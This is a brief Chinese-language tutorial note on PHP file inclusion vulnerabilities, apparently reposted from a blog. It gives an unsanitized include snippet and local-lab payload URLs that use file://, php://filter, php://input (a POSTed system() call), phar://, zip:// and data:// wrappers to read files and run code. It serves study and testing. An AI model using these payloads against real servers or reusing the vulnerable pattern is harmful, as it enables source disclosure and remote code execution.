标签:失败 输入输出 照片 文件包含漏洞 local 数据 system 显示 先来
include()
include_once()
require()
require_once()
<?php $file = $_GET[‘file‘]; include $file; ?>
file:// 访问本地文件系统 http:// 访问 HTTPs 网址 ftp:// 访问 ftp URL Php:// 访问输入输出流 Zlib:// 压缩流
Data:// 数据
Ssh2:// security shell2 Expect:// 处理交互式的流 Glob:// 查找匹配的文件路径 phar:// PHP 归档
http://localhost/include/include.php?file=file://c:\1.txt
这里需要写入绝对路径 否则包含不了。
http://127.0.0.1/include/include.php?file=php://filter/resource=../test/1.txt
php://filter/read=convert.base64-encode/resource=include.php
allow_url_include 为on
http://127.0.0.1/include/include.php?file=php://input
post传入数据
<?php system(‘ipconfig‘);?>
http://127.0.0.1/include/include.php?file=phar://phpinfo.rar/phpinfo.txt
http://127.0.0.1/include/include.php?file=zip://phpinfo.rar%23phpinfo.txt
http://127.0.0.1/include/include.php?file=data://test/plain,<?php phpinfo();?>
http://127.0.0.1/include/include.php?file=data://test/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
标签:失败 输入输出 照片 文件包含漏洞 local 数据 system 显示 先来
原文地址:https://www.cnblogs.com/nice0e3/p/12815021.html